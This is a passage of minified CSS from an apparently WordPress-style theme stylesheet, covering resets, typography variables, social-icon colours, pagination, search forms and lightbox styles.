strong, sub, sup, tt, var, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td { font-family: inherit; font-size: 100%; font-weight: inherit; font-style: inherit; line-height: inherit; margin: 0; padding: 0; vertical-align: baseline; border: 0; outline: 0; } html { font-size: var(--body-fsize); overflow-x: hidden; text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; } body { font-family: var(--body-family); font-size: var(--body-fsize); font-weight: var(--body-fweight); font-style: var(--body-fstyle); line-height: 1.7; display: block; margin: 0; letter-spacing: var(--body-fspace); text-transform: var(--body-transform); color: var(--body-fcolor); background-color: var(--solid-white); } body.rtl { /*rtl:ignore*/ direction: rtl; } * { -moz-box-sizing: border-box; -webkit-box-sizing: border-box; box-sizing: border-box; } :before, :after { -moz-box-sizing: border-box; -webkit-box-sizing: border-box; box-sizing: border-box } .site { position: relative; display: block; } .site * { text-rendering: optimizeLegibility; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .site-outer { position: relative; display: block; max-width: 100%; background-color: var(--solid-white); } .top-spacing .site-outer { -webkit-transition: margin .5s var(--timing); transition: margin .5s var(--timing); } .site-wrap, .site-content { position: relative; z-index: 0; display: block; margin: 0; padding: 0; } .site-wrap { min-height: 45vh; } button, hr, input { overflow: visible } audio, canvas, progress, video { display: inline-block } progress, sub, sup { vertical-align: baseline } [type=checkbox], [type=radio], legend { box-sizing: border-box; padding: 0 } acronym { cursor: help } .rbct mark, .rbct ins { text-decoration: none; background-color: rgba(0, 0, 0, .07); } figure { display: block; margin: 0; } cite, em { font-weight: normal; font-style: italic; } hr { box-sizing: content-box; height: 0 } u { text-decoration: underline; } dt { font-weight: 700; } dd { margin-inline-start: 40px; } address { font-style: italic; } code, kbd, pre, samp, var { font-family: monospace, monospace; font-size: .9em; } a { text-decoration: none; color: inherit; background-color: transparent; } abbr[title] { cursor: default; text-decoration: none; } b, strong { font-weight: 700; } dfn { font-style: italic } mark { color: #000; background-color: #ff0; } code { font-family: Courier, monospace; background-color: var(--flex-gray-7); } small { font-size: 80% } sub, sup { font-size: 75%; line-height: 0; position: relative; } sub { bottom: -.25em } sup { top: -.5em } audio:not([controls]) { display: none; height: 0 } img { max-width: 100%; height: auto; vertical-align: middle; border-style: none; object-fit: cover; -webkit-object-fit: cover; } svg:not(:root) { overflow: hidden } button, input, optgroup, select, textarea { text-transform: none; color: inherit; outline: none !important; } .bypostauthor { position: relative; } .screen-reader-text, .screen-reader-text span, .ui-helper-hidden-accessible { position: absolute; overflow: hidden; clip: rect(1px, 1px, 1px, 1px); width: 1px; height: 1px; margin: -1px; padding: 0; word-wrap: normal !important; border: 0; -webkitcolorip-path: inset(50%); clip-path: inset(50%); } select { line-height: 22px; position: relative; max-width: 100%; padding: 10px; border-color: var(--flex-gray-15); border-radius: var(--round-5); outline: none !important; background: transparent url('data:image/svg+xml;utf8,') no-repeat right 5px top 50%; background-size: 22px; -moz-appearance: none; -webkit-appearance: none; appearance: none; } select option { background-color: var(--solid-white); } [type=reset], [type=submit], button, html [type=button] { -webkit-appearance: button; } [type=button]::-moz-focus-inner, [type=reset]::-moz-focus-inner, [type=submit]::-moz-focus-inner, button::-moz-focus-inner { padding: 0; border-style: none; } [type=button]:-moz-focusring, [type=reset]:-moz-focusring, [type=submit]:-moz-focusring, button:-moz-focusring { outline: ButtonText dotted 1px; } :-webkit-autofill { -webkit-box-shadow: 0 0 0 30px #fafafa inset; } fieldset { padding: 0; } legend { font-weight: 700; display: table; max-width: 100%; white-space: normal; color: inherit; } textarea { overflow: auto; } [type='number']::-webkit-inner-spin-button, [type='number']::-webkit-outer-spin-button { height: auto; } [type='search']::-webkit-search-cancel-button, [type='search']::-webkit-search-decoration { -webkit-appearance: none } ::-webkit-file-upload-button { font: inherit; -webkit-appearance: button } summary { display: list-item } [hidden], template { display: none } del { text-decoration: line-through; } big { font-size: 125%; } .clearfix:before, .clearfix:after { display: table; clear: both; content: ' '; } .rb-error { font-size: var(--rem-mini); } .hidden { display: none; } h1, .h1 { font-family: var(--h1-family); font-size: var(--h1-fsize); font-weight: var(--h1-fweight); font-style: var(--h1-fstyle); line-height: var(--h1-fheight, 1.2); letter-spacing: var(--h1-fspace); text-transform: var(--h1-transform); } h1 { color: var(--h1-fcolor); } h2, .h2 { font-family: var(--h2-family); font-size: var(--h2-fsize); font-weight: var(--h2-fweight); font-style: var(--h2-fstyle); line-height: var(--h2-fheight, 1.25); letter-spacing: var(--h2-fspace); text-transform: var(--h2-transform); } h2 { color: var(--h2-fcolor); } h3, .h3 { font-family: var(--h3-family); font-size: var(--h3-fsize); font-weight: var(--h3-fweight); font-style: var(--h3-fstyle); line-height: var(--h3-fheight, 1.3); letter-spacing: var(--h3-fspace); text-transform: var(--h3-transform); } h3 { color: var(--h3-fcolor); } h4, .h4 { font-family: var(--h4-family); font-size: var(--h4-fsize); font-weight: var(--h4-fweight); font-style: var(--h4-fstyle); line-height: var(--h4-fheight, 1.45); letter-spacing: var(--h4-fspace); text-transform: var(--h4-transform); } h4 { color: var(--h4-fcolor); } .h5, h5 { font-family: var(--h5-family); font-size: var(--h5-fsize); font-weight: var(--h5-fweight); font-style: var(--h5-fstyle); line-height: var(--h5-fheight, 1.5); letter-spacing: var(--h5-fspace); text-transform: var(--h5-transform); } h5 { color: var(--h5-fcolor); } h6, .h6 { font-family: var(--h6-family); font-size: var(--h6-fsize); font-weight: var(--h6-fweight); font-style: var(--h6-fstyle); line-height: var(--h6-fheight, 1.5); letter-spacing: var(--h6-fspace); text-transform: var(--h6-transform); } h6 { color: var(--h6-fcolor); } .p-categories { font-family: var(--cat-family); font-size: var(--cat-fsize); font-weight: var(--cat-fweight); font-style: var(--cat-fstyle); letter-spacing: var(--cat-fspace); text-transform: var(--cat-transform); } .is-meta, .meta-text, .user-form label, .rss-date, .widget_rss cite, .woocommerce-result-count, .woocommerce-ordering select { font-family: var(--meta-family); font-size: var(--meta-fsize); font-weight: var(--meta-fweight); font-style: var(--meta-fstyle); letter-spacing: var(--meta-fspace); text-transform: var(--meta-transform); } .meta-label, .tipsy-inner, .product_meta { font-family: var(--meta-family); font-weight: var(--meta-fweight); font-style: var(--meta-fstyle); letter-spacing: var(--meta-fspace); text-transform: var(--meta-transform); color: var(--meta-fcolor); } figcaption, .wp-caption-text { font-family: var(--meta-family); font-size: var(--meta-fsize); font-weight: var(--meta-fweight); font-style: var(--meta-fstyle); letter-spacing: var(--meta-fspace); text-transform: var(--meta-transform); } .is-meta { color: var(--meta-fcolor); } .meta-author, .meta-bold { font-family: var(--meta-b-family); font-size: inherit; font-weight: var(--meta-b-fweight); font-style: var(--meta-b-fstyle); letter-spacing: var(--meta-b-fspace); text-transform: var(--meta-b-transform); } .meta-author *:not(em), .meta-bold { color: var(--meta-b-fcolor, var(--body-fcolor)); } .p-readmore { font-family: var(--btn-family); font-size: var(--readmore-fsize, 12px); font-weight: 600; font-style: normal; text-transform: none; } input[type='text'], input[type='tel'], input[type='password'], input[type='email'], input[type='url'], input[type='search'], input[type='number'], textarea { font-family: var(--input-family); font-size: var(--input-fsize); font-weight: var(--input-fweight); font-style: var(--input-fstyle); line-height: 1.5; letter-spacing: var(--input-fspace); text-transform: var(--input-transform); color: var(--input-fcolor); } textarea { font-size: var(--input-fsize) !important; } input[type='submit'], button, .button, .is-btn, a.show-post-comment, a.comment-reply-link, .pagination-wrap, .rbbsl a > span, .widget_block .wp-block-search [type='submit'] { font-family: var(--btn-family); font-size: var(--btn-fsize); font-weight: var(--btn-fweight); font-style: var(--btn-fstyle); letter-spacing: var(--btn-fspace); text-transform: var(--btn-transform); } .comment-list .comment-reply-title small a { font-family: var(--btn-family); font-weight: var(--btn-fweight); font-style: var(--btn-fstyle); letter-spacing: var(--btn-fspace); text-transform: var(--btn-transform); } .breadcrumb-inner, .woocommerce-breadcrumb { font-family: 'Encode Sans Condensed', sans-serif; font-size: var(--bcrumb-fsize, 13px); font-weight: 600; font-style: normal; line-height: 1.5; color: var(--bcrumb-color, inherit); } .main-menu > li > a, .more-col .widget-heading, .elementor-widget-wp-widget-nav_menu h5, .woocommerce-MyAccount-navigation { font-family: var(--menu-family); font-size: var(--menu-fsize); font-weight: var(--menu-fweight); font-style: var(--menu-fstyle); line-height: 1.5; letter-spacing: var(--menu-fspace); text-transform: var(--menu-transform); } .main-menu .sub-menu > .menu-item a, .user-dropdown a, .more-col .menu a, .collapse-footer-menu a, .elementor-widget-container .menu a { font-family: var(--submenu-family); font-size: var(--submenu-fsize); font-weight: var(--submenu-fweight); font-style: var(--submenu-fstyle); line-height: 1.25; letter-spacing: var(--submenu-fspace); text-transform: var(--submenu-transform); color: var(--subnav-color); } .mobile-menu > li > a { font-family: 'Encode Sans Condensed', sans-serif; font-size: 1.1rem; font-weight: 400; font-style: normal; line-height: 1.5; letter-spacing: -.02em; text-transform: none; } .mobile-menu .sub-menu a { font-family: 'Encode Sans Condensed', sans-serif; font-size: 14px; font-weight: 700; font-style: normal; line-height: 1.5; text-transform: none; } .mobile-qview a { font-family: 'Encode Sans Condensed', sans-serif; font-size: 16px; font-weight: 600; font-style: normal; letter-spacing: -0.02em; text-transform: none; } .s-title { font-family: var(--headline-family, var(--h1-family)); font-size: var(--headline-fsize, var(--h1-fsize)); font-weight: var(--headline-fweight, var(--h1-fweight)); font-style: var(--headline-fstyle, var(--h1-fstyle)); letter-spacing: var(--headline-fspace, var(--h1-fspace)); text-transform: var(--headline-transform, var(--h1-transform)); color: var(--headline-fcolor, var(--h1-fcolor)); } .s-tagline { font-family: var(--tagline-family); font-size: var(--tagline-fsize); font-weight: var(--tagline-fweight); font-style: var(--tagline-fstyle); line-height: var(--tagline-fheight, 1.4); letter-spacing: var(--tagline-fspace); text-transform: var(--tagline-transform); color: var(--tagline-fcolor, inherit); } .s-title:not(.fw-headline) { font-size: var(--headline-s-fsize, var(--h1-fsize)); } .s-tagline:not(.fw-tagline) { font-size: var(--tagline-s-fsize); } .heading-title > * { font-family: var(--heading-family, inherit); font-size: var(--heading-fsize, inherit); font-weight: var(--heading-fweight, inherit); font-style: var(--heading-fstyle, inherit); letter-spacing: var(--heading-fspace, inherit); text-transform: var(--heading-transform, inherit); } .heading-tagline > * { font-family: var(--subheading-family, inherit); font-size: var(--subheading-fsize, inherit); font-weight: var(--subheading-fweight, inherit); font-style: var(--subhading-fstyle, inherit); letter-spacing: var(--subheading-fspace, inherit); text-transform: var(--subheading-transform, inherit); } .description-text { font-size: var(--excerpt-fsize); } .p-wrap .entry-summary { font-size: var(--excerpt-fsize); color: var(--excerpt-color); } input[type='text'], input[type='tel'], input[type='password'], input[type='email'], input[type='url'], input[type='search'], input[type='number'] { line-height: 22px; max-width: 100%; padding: 10px 20px; -webkit-transition: var(--effect); transition: var(--effect); white-space: nowrap; border: none; border-radius: var(--round-3); outline: none !important; background-color: var(--flex-gray-7); -webkit-box-shadow: none !important; box-shadow: none !important; } input[type='submit']:not(.search-submit), button, .is-btn, .button { line-height: var(--height-40); padding: var(--padding-40); cursor: pointer; -webkit-transition: var(--effect); transition: var(--effect); white-space: nowrap; color: var(--absolute-white); border: none; -webkit-border-radius: var(--round-3); border-radius: var(--round-3); outline: none !important; background: var(--g-color); -webkit-box-shadow: none; box-shadow: none; } input[type='submit']:not(.search-submit):hover, button:hover, .is-btn:hover { -webkit-box-shadow: 0 4px 15px var(--g-color-90); box-shadow: 0 4px 15px var(--g-color-90); } textarea { display: block; width: 100%; max-width: 100%; padding: 10px 25px; -webkit-transition: var(--effect); transition: var(--effect); border: none; border-radius: var(--round-3); outline: none; background-color: var(--flex-gray-7); -webkit-box-shadow: none !important; box-shadow: none !important; } .rb-container, .rb-wide-container, .rb-small-container { position: static; display: block; width: 100%; max-width: 1280px; margin-right: auto; margin-left: auto; } .rb-wide-container { max-width: 1500px; } .rb-small-container { max-width: 860px; } .gutter-n20 { margin-right: -20px; margin-left: -20px; } .gutter-n15 { margin-right: -15px; margin-left: -15px; } .gutter-m20 { margin-right: 20px; margin-left: 20px; } .gutter-p20 { padding-right: 20px; padding-left: 20px; } .gutter-p15 { padding-right: 15px; padding-left: 15px; } .gutter-p10 { padding-right: 10px; padding-left: 10px; } .edge-padding { padding-right: 20px; padding-left: 20px; } .rb-section ul, .rb-section ol { list-style: none; } h1, h2, h3, h4, h5, h6, .h1, .h2, .h3, .h4, .h5, .h6 { -ms-word-wrap: break-word; word-wrap: break-word; } .icon-holder { display: flex; align-items: center; } .svg-icon { width: 1.5em; height: auto; } .overlay-text .meta-inner, .overlay-text .meta-text, .overlay-text .is-meta, .overlay-text .meta-label { color: var(--absolute-light); } .overlay-text .entry-title, .overlay-text .counter-el, .overlay-text .s-title, .overlay-text .s-title.fw-headline, .overlay-text .rb-icon, .overlay-text .meta-author *:not(em), .overlay-text .meta-bold, .overlay-text .rb-bookmark, .overlay-text .caption-text, .overlay-text .rbi-bookmark, .overlay-text .t-shared-sec .share-action, .overlay-text .breadcrumb-inner, .overlay-text .sponsor-icon, .overlay-text .p-link, [data-theme='dark'] .t-shared-sec .share-action, [data-theme='dark'] .sticky-share-list .share-action, .white-text * { color: var(--absolute-white); } .overlay-text .entry-summary, .overlay-text .s-tagline, .overlay-text .s-tagline.fw-tagline { color: #f2f2f2; } .light-scheme { color: var(--body-fcolor); } input:-webkit-autofill, input:-webkit-autofill:hover, input:-webkit-autofill:focus, input:-webkit-autofill:active { transition: background-color 999999s ease-in-out 0s; } .holder-wrap { position: relative; } .overlay-wrap { position: absolute; z-index: 10; top: 0; right: 0; bottom: 0; left: 0; display: flex; align-items: flex-end; flex-flow: row nowrap; pointer-events: none; } .overlay-inner { position: relative; display: block; width: 100%; padding: 20px; cursor: auto; pointer-events: auto; } .overlay-inner .counter-el { padding: 20px; } .p-gradient { background: -webkit-gradient(linear, left top, left bottom, from(var(--dark-accent-0)), to(var(--dark-accent))); background: linear-gradient(to top, var(--dark-accent) 0, var(--dark-accent-90) 50%, var(--dark-accent-0) 100%); } .p-vtop .p-gradient { background: -webkit-gradient(linear, left bottom, left top, from(var(--dark-accent-0)), to(var(--dark-accent))); background: linear-gradient(to bottom, var(--dark-accent) 0, var(--dark-accent-90) 50%, var(--dark-accent-0) 100%); } .p-highlight .p-gradient { background-color: var(--dark-accent); } .rb-columns > .block-inner { display: flex; flex-flow: row wrap; flex-basis: 100%; flex-grow: 1; } .is-gap-5 .block-inner { margin-right: -5px; margin-left: -5px; --column-gap: 5px; } .is-gap-7 .block-inner { margin-right: -7px; margin-left: -7px; --column-gap: 7px; } .is-gap-10 .block-inner { margin-right: -10px; margin-left: -10px; --column-gap: 10px; } .is-gap-15 .block-inner { margin-right: -15px; margin-left: -15px; --column-gap: 15px; } .is-gap-20 .block-inner { margin-right: -20px; margin-left: -20px; --column-gap: 20px; } .is-gap-25 .block-inner { margin-right: -25px; margin-left: -25px; --column-gap: 25px; } .is-gap-30 .block-inner { margin-right: -30px; margin-left: -30px; --column-gap: 30px; } .is-gap-35 .block-inner { margin-right: -35px; margin-left: -35px; --column-gap: 35px; } .rb-columns > .block-inner > * { flex-basis: 100%; width: 100%; padding-right: var(--column-gap, 0); padding-left: var(--column-gap, 0); } [class*='is-gap-'] > .block-inner > * { padding-right: var(--column-gap, 0); padding-left: var(--column-gap, 0); } .is-color .icon-facebook { color: #89abfc; } .is-color .icon-facebook:hover { color: #1f82ec; text-shadow: 0 5px 15px #1f82ec; } .is-bg .icon-facebook { background-color: #89abfc; } .is-bg .icon-facebook:hover { background-color: #1f82ec; box-shadow: 0 5px 15px #1f82ec; } .is-color .icon-twitter { color: #60d2f5; } .is-color .icon-twitter:hover { color: #13b9ee; text-shadow: 0 5px 15px #13b9ee; } .is-bg .icon-twitter { background-color: #60d2f5; } .is-bg .icon-twitter:hover { background-color: #13b9ee; box-shadow: 0 5px 15px #13b9ee; } .is-color .icon-pinterest { color: #f74c53; } .is-color .icon-pinterest:hover { color: #f60c19; text-shadow: 0 5px 15px #f60c19; } .is-bg .icon-pinterest { background-color: #f74c53; } .is-bg .icon-pinterest:hover { background-color: #f60c19; box-shadow: 0 5px 15px #f60c19; } .is-color .icon-instagram { color: #7e40b6; } .is-color .icon-instagram:hover { color: #8823b6; text-shadow: 0 5px 15px #8823b6; } .is-bg .icon-instagram { background-color: #7e40b6; } .is-bg .icon-instagram:hover { background-color: #8823b6; box-shadow: 0 5px 15px #8823b6; } .is-color .icon-linkedin { color: #007bb6; } .is-color .icon-linkedin:hover { color: #006ab1; text-shadow: 0 5px 15px #006ab1; } .is-bg .icon-linkedin { background-color: #007bb6; } .is-bg .icon-linkedin:hover { background-color: #006ab1; box-shadow: 0 5px 15px #006ab1; } .is-color .icon-tumblr { color: #32506d; } .is-color .icon-tumblr:hover { color: #1f3143; text-shadow: 0 5px 15px #1f3143; } .is-bg .icon-tumblr { background-color: #32506d; } .is-bg .icon-tumblr:hover { background-color: #1f3143; box-shadow: 0 5px 15px #1f3143; } .is-color .icon-flickr { color: #ff0082; } .is-color .icon-flickr:hover { color: #ff015a; text-shadow: 0 5px 15px #ff015a; } .is-bg .icon-flickr { background-color: #ff0082; } .is-bg .icon-flickr:hover { background-color: #ff015a; box-shadow: 0 5px 15px #ff015a; } .is-color .icon-skype { color: #00aae1; } .is-color .icon-skype:hover { color: #0070bf; text-shadow: 0 5px 15px #0070bf; } .is-bg .icon-skype { background-color: #00aae1; } .is-bg .icon-skype:hover { background-color: #0070bf; box-shadow: 0 5px 15px #0070bf; } .is-color .icon-snapchat { color: #ffc94f; } .is-color .icon-snapchat:hover { color: #e3c100; text-shadow: 0 5px 15px #e3c100; } .is-bg .icon-snapchat { background-color: #ffc94f; } .is-bg .icon-snapchat:hover { background-color: #e3c100; box-shadow: 0 5px 15px #e3c100; } .is-color .icon-myspace { color: #030303; } .is-color .icon-myspace:hover { color: #000; text-shadow: 0 5px 15px #000; } .is-bg .icon-myspace { background-color: #030303; } .is-bg .icon-myspace:hover { background-color: #000; box-shadow: 0 5px 15px #000; } .is-color .icon-youtube { color: #ef464b; } .is-color .icon-youtube:hover { color: #fc161e; text-shadow: 0 5px 15px #fc161e; } .is-bg .icon-youtube { background-color: #ef464b; } .is-bg .icon-youtube:hover { background-color: #fc161e; box-shadow: 0 5px 15px #fc161e; } .is-color .icon-bloglovin { color: #111; } .is-color .icon-bloglovin:hover { color: #000; text-shadow: 0 5px 15px #000; } .is-bg .icon-bloglovin { background-color: #111; } .is-bg .icon-bloglovin:hover { background-color: #000; box-shadow: 0 5px 15px #000; } .is-color .icon-digg { color: #191919; } .is-color .icon-digg:hover { color: #000; } .is-bg .icon-digg { background-color: #191919; } .is-color .icon-digg:hover { color: #000; text-shadow: 0 5px 15px #000; } .is-color .icon-dribbble { color: #fb70a6; } .is-color .icon-dribbble:hover { color: #ff407f; text-shadow: 0 5px 15px #ff407f; } .is-bg .icon-dribbble { background-color: #fb70a6; } .is-bg .icon-dribbble:hover { background-color: #ff407f; box-shadow: 0 5px 15px #ff407f; } .is-color .icon-soundcloud { color: #fd794a; } .is-color .icon-soundcloud:hover { color: #ff5313; text-shadow: 0 5px 15px #ff5313; } .is-bg .icon-soundcloud { background-color: #fd794a; } .is-bg .icon-soundcloud:hover { background-color: #ff5313; box-shadow: 0 5px 15px #ff5313; } .is-color .icon-vk { color: #5fa0dd; } .is-color .icon-vk:hover { color: #005f8c; } .is-bg .icon-vk { background-color: #5fa0dd; } .is-bg .icon-vk:hover { background-color: #005f8c; box-shadow: 0 5px 15px #005f8c; } .is-color .icon-whatsapp { color: #00e676; } .is-color .icon-whatsapp:hover { color: #00e537; text-shadow: 0 5px 15px #00e537; } .is-bg .icon-whatsapp { background-color: #00e676; } .is-bg .icon-whatsapp:hover { background-color: #00e537; box-shadow: 0 5px 15px #00e537; } .is-color .icon-vimeo { color: #44bbe1; } .is-color .icon-vimeo:hover { color: #16b1e3; text-shadow: 0 5px 15px #16b1e3; } .is-bg .icon-vimeo { background-color: #44bbe1; } .is-bg .icon-vimeo:hover { background-color: #16b1e3; box-shadow: 0 5px 15px #16b1e3; } .is-color .icon-telegram { color: #649fdf; } .is-color .icon-telegram:hover { color: #3885d9; text-shadow: 0 5px 15px #3885d9; } .is-bg .icon-telegram { background-color: #649fdf; } .is-bg .icon-telegram:hover { background-color: #3885d9; box-shadow: 0 5px 15px #3885d9; } .is-color .icon-rss { color: #ffd43f; } .is-color .icon-rss:hover { color: #eab910; text-shadow: 0 5px 15px #eab910; } .is-bg .icon-rss { background-color: #ffd43f; } .is-bg .icon-rss:hover { background-color: #eab910; box-shadow: 0 5px 15px #eab910; } .is-color .icon-reddit { color: #ff4500; } .is-color .icon-reddit:hover { color: #e02200; text-shadow: 0 5px 15px #e02200; } .is-bg .icon-reddit { background-color: #ff4500; } .is-bg .icon-reddit:hover { background-color: #e02200; box-shadow: 0 5px 15px #e02200; } .is-color .icon-email { color: #efab68; } .is-color .icon-email:hover { color: #ff9c38; text-shadow: 0 5px 15px #ff9c38; } .is-bg .icon-email { background-color: #efab68; } .is-bg .icon-email:hover { background-color: #ff9c38; box-shadow: 0 5px 15px #ff9c38; } .is-color .icon-copy { color: #66bbbf; } .is-color .icon-copy:hover { color: #38787a; } .is-color .icon-print { color: #4082f1; } .is-color .icon-print:hover { color: #0f67f6; text-shadow: 0 5px 15px #0f67f6; } .is-bg .icon-copy { background-color: #66bbbf; } .is-bg .icon-copy:hover { background-color: #38787a; box-shadow: 0 5px 15px #38787a; } .is-bg .icon-print { background-color: #4082f1; } .is-bg .icon-print:hover { background-color: #0f67f6; box-shadow: 0 5px 15px #0f67f6; } .is-color .icon-custom { color: var(--dark-accent); } .effect-fadeout.activated a { opacity: .3; } .effect-fadeout.activated a:hover, .effect-fadeout.activated a:focus { opacity: 1; } .t-shared-sec .share-action:hover, .l-shared-sec .share-action:hover, .footer-social-list a:hover { -webkit-transform: scale(1.2); transform: scale(1.2); } .is-bg { color: var(--absolute-white); } .is-bg * { color: inherit; } .is-hidden { display: none !important; } .is-invisible { visibility: hidden; opacity: 0; } .rb-loader { font-size: 10px; position: relative; display: none; overflow: hidden; width: 3em; height: 3em; transform: translateZ(0); animation: spin-loader .8s infinite linear; text-indent: -9999em; color: var(--g-color); border-radius: 50%; background: currentColor; background: linear-gradient(to right, currentColor 10%, rgba(255, 255, 255, 0) 50%); } .rb-loader:before { position: absolute; top: 0; left: 0; width: 50%; height: 50%; content: ''; color: inherit; border-radius: 100% 0 0 0; background: currentColor; } .rb-loader:after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; width: 75%; height: 75%; margin: auto; content: ''; opacity: 0.5; border-radius: 50%; background: var(--solid-white); } @-webkit-keyframes spin-loader { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } @keyframes spin-loader { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } .rb-loader.loader-absolute { position: absolute; bottom: 50%; left: 50%; display: block; margin-top: -1.5em; margin-left: -1.5em; } .opacity-animate { -webkit-transition: opacity .25s var(--timing); transition: opacity .25s var(--timing); } .is-invisible { opacity: 0; } .pagination-wrap { position: relative; display: flex; justify-content: center; width: 100%; margin-top: var(--bottom-spacing); padding-right: var(--column-gap, 0); padding-left: var(--column-gap, 0); } .pagination-nextprev > *:first-child { margin-right: 10px; } .pagination-trigger.is-disable { pointer-events: none; opacity: .5; } .loadmore-trigger span, .pagination-trigger, .pagination-wrap .older a, .pagination-wrap .newer a, .pagination-number .page-numbers { line-height: var(--height-34); position: relative; display: inline-flex; align-items: center; flex-flow: row nowrap; padding: var(--padding-40); -webkit-transition: var(--effect); transition: var(--effect); border-radius: var(--round-7); background-color: var(--flex-gray-7); } .pagination-number .page-numbers { border: 1px solid var(--flex-gray-15); background-color: transparent; } .pagination-number .page-numbers { margin: 0 3px; padding: 0 15px; } .pagination-number .page-numbers:not(.prev):not(.next) { padding: 0 10px; } .pagination-number span.page-numbers:not(.dots) { color: #fff; border-color: var(--g-color); background-color: var(--g-color); } .pagination-number span.page-numbers.dots { padding: 0 20px; opacity: .5; border-color: transparent; background-color: transparent; } .pagination-number span.page-numbers { pointer-events: none; } .loadmore-trigger.loading span { opacity: 0; } .pagination-loadmore .rb-loader { font-size: 8px; position: absolute; top: 50%; left: 50%; margin-top: -1.5em; margin-left: -1.5em; } .infinite-trigger { position: relative; display: flex; justify-content: center; width: 100%; min-height: 3em; } .infinite-trigger .rb-loader { position: absolute; top: 0; left: 50%; margin-left: -1.5em; } .page-links { display: flex; align-items: center; justify-content: space-between; } .page-links .post-page-numbers { line-height: var(--height-34); position: relative; display: inline-flex; align-items: center; flex-flow: row nowrap; margin: 0 2px; padding: 0 10px; -webkit-transition: var(--effect); transition: var(--effect); text-decoration: none !important; border-radius: var(--round-7); background-color: var(--flex-gray-7); } .page-links a.post-page-numbers:hover { color: var(--absolute-white) !important; } .page-links .text-link-next .post-page-numbers, .page-links .text-link-prev .post-page-numbers { padding: var(--padding-40); } .page-links .post-page-numbers.current { color: var(--absolute-white); background: var(--g-color); } .text-link-next a span { margin-right: 4px; } .text-link-prev a span { margin-left: 4px; } .pagination-simple > * { padding-right: 10px; padding-left: 10px; } .pagination-simple .older:first-child { margin-left: auto; padding-right: 0; padding-left: 0; } .pagination-simple .newer:last-child { margin-right: auto; padding-right: 0; padding-left: 0; } a.page-numbers:hover, .page-links a.post-page-numbers:hover, .pagination-nextprev a:hover, .pagination-wrap:not(.pagination-nextprev):not(.page-links) a:hover span, .pagination-simple a:hover { color: var(--absolute-white); background-color: var(--g-color); -webkit-box-shadow: 0 0 15px var(--g-color-90); box-shadow: 0 0 15px var(--g-color-90); } body .p-wrap.end-list-info { flex: 0 0 100%; max-width: 100%; margin-top: 40px; text-align: center; } .end-list-info i { margin-right: 7px; } .search-form, .wp-block-search__inside-wrapper { position: relative; display: flex; overflow: hidden; align-items: stretch; flex-flow: row nowrap; width: 100%; border-radius: var(--round-7); background-color: var(--flex-gray-7); } .search-form-input { flex-grow: 1; } .search-form input[type='search'] { width: 100%; padding: 15px 15px 15px 5px; background: none !important; } .wp-block-search .wp-block-search__button { margin: 0; } .wp-block-search input[type='search'] { position: relative; width: 100%; padding: 0 20px; border: none; background: none !important; } .widget_block.widget_search form { position: relative; display: flex; overflow: hidden; align-items: stretch; flex-flow: row nowrap; width: 100%; } .widget_search.widget_block input[type='search'] { padding: 10px 20px; } .search-form-icon { display: flex; align-items: center; flex-grow: 0; flex-shrink: 0; justify-content: center; padding: 0 10px; } .search-form-icon i { font-size: var(--em-small); } .search-form-submit { position: relative; display: flex; align-items: center; flex-grow: 0; flex-shrink: 0; justify-content: center; } .search-form-submit:before { position: absolute; top: 50%; left: 0; height: .8em; margin-top: -.4em; content: ''; border-left: 2px solid var(--g-color); } .search-submit, .wp-block-search [type='submit'] { height: 100%; padding: 0 20px; cursor: pointer; -webkit-transition: var(--effect); transition: var(--effect); border: none; background-color: transparent; -webkit-box-shadow: none; box-shadow: none; } .wp-block-search [type='submit'] { border-left: 2px solid var(--g-color); border-top-left-radius: 0; border-bottom-left-radius: 0; } .search-submit:hover, .search-submit:active, .wp-block-search [type='submit']:hover, .wp-block-search [type='submit']:active { color: #fff; background-color: var(--g-color); -webkit-box-shadow: 0 4px 15px var(--g-color-90); box-shadow: 0 4px 15px var(--g-color-90); } .wp-block-search__label { display: none; } .mfp-bg { position: fixed; z-index: 9042; top: 0; left: 0; overflow: hidden; width: 100%; height: 100%; background: var(--dark-accent); } .mfp-wrap { position: fixed; z-index: 9043; top: 0; left: 0; width: 100%; height: 100%; outline: none !important; -webkit-backface-visibility: hidden; } .mfp-container { position: absolute; top: 0; left: 0; box-sizing: border-box; width: 100%; height: 100%; padding: 0 8px; text-align: center; } .mfp-container:before { display: inline-block; height: 100%; content: ''; vertical-align: middle; } .mfp-align-top .mfp-container:before { display: none; } .mfp-content { position: relative; z-index: 1045; display: inline-block; margin: 0 auto; text-align: left; vertical-align: middle; } .mfp-inline-holder .mfp-content, .mfp-ajax-holder .mfp-content { width: 100%; cursor: auto; } .mfp-ajax-cur { cursor: progress; } .mfp-zoom-out-cur, .mfp-zoom-out-cur .mfp-image-holder .mfp-close { cursor: zoom-out; } .mfp-zoom { cursor: zoom-in; } .mfp-auto-cursor .mfp-content { cursor: auto; } .mfp-close, .mfp-arrow, .mfp-preloader, .mfp-counter { -moz-user-select: none; -webkit-user-select: none; user-select: none; } .mfp-loading.mfp-figure { display: none; } .mfp-hide { display: none !important; } .mfp-preloader { position: absolute; z-index: 1044; top: 50%; right: 8px; left: 8px; width: auto; margin-top: -0.8em; text-align: center; color: #ccc; } .mfp-preloader a { color: #ccc; } .mfp-preloader a:hover { color: #fff; } .mfp-s-ready .mfp-preloader { display: none; } .mfp-s-error .mfp-content { display: none; } button::-moz-focus-inner { padding: 0; border: 0; } .mfp-counter { font-size: 12px; line-height: 18px; position: absolute; top: 0; right: 0; white-space: nowrap; color: #ccc; } .mfp-arrow { position: absolute; top: 50%; width: 90px; height: 110px; margin: 0; margin-top: -55px; padding: 0; opacity: 0.65; -webkit-tap-highlight-color: transparent; } .mfp-arrow:active { margin-top: -54px; } .mfp-arrow:hover, .mfp-arrow:focus { opacity: 1; } .mfp-arrow:before, .mfp-arrow:after { position: absolute; top: 0; left: 0; display: block; width: 0; height: 0; margin-top: 35px; margin-left: 35px; content: ''; border: medium inset transparent; } .mfp-arrow:after { top: 8px; border-top-width: 13px; border-bottom-width: 13px; } .mfp-arrow:before { opacity: 0.7; border-top-width: 21px; border-bottom-width: 21px; } .mfp-arrow-left { left: 0; } .mfp-arrow-left:after { margin-left: 31px; border-right: 17px solid #fff; } .mfp-arrow-left:before { margin-left: 25px; border-right: 27px solid 